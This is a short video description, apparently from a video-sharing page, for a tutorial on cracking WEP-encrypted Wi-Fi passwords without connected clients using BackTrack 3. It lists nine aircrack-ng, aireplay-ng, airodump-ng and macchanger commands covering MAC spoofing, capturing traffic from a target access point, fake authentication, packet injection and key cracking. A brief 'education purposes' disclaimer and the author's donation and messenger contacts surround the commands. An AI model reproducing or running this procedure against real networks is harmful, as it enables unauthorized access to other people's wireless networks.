Crack wep CLIENTLESS with backtrack3
Please donate any amount of money to my paypal which is kivi12k@aol.com Better quality: http://blip.tv/file/1010497 or youtube better quality: http://www.youtube.com/watch?v=kcoKE-KDg8E&fmt=18 This is a tutorial on howto crack a wep encrypted password clientless. This information should only be used for education purposes. Steps: 1)airmon-ng stop wlan0 2)ifconfig wlan0 down 3)macchanger --mac 00:11:22:33:44:55 wlan0 4)airmon-ng start wlan0 5)airodump-ng wlan0 6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0 7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0 8)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0 9)aircrack-ng (filename-01.cap) If you need any help feel free to PM me or shoot me an instant message, a donation would also be appreciated. You can instant message me at: AIM - kivi12k@aol.com WINDOWS MESSENGER - kivi12k@hotmail.com YAHOO MESSENGER - kivi12k@ymail.com
Похожие видео
Показать еще